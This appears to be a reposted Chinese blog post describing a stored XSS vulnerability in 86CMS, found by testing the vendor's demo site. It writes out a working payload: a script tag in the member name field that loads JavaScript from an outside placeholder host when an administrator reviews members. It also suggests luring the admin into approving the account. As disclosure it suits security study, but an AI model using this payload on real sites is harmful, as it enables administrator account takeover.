帮朋友做个企业站,功能不要太多,就准备在网上找找,就看见86CMS了,碰巧有演示站!就小测试了一下! 因为程序简单,这个XSS基本不针对访问者,只针对管理员 注册一个会员,在姓名中填写
<SCRIPT/XSS SRC="http://www.xxx.xx/xss.js"></SCRIPT> 引用外部JS! 当管理员进入后台,点击会员管理(网站默认有会员审核机制),可以注册一个会员,然后通过网站 联系管理员要求审核通过! 测试的时候发现只屏蔽了 () 什么<>'"都木有屏蔽 而且只要输入非法的东西,都提示[不要注入]
查看更多关于86CMS储存型XSS - 网站安全 - 自学php的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did13780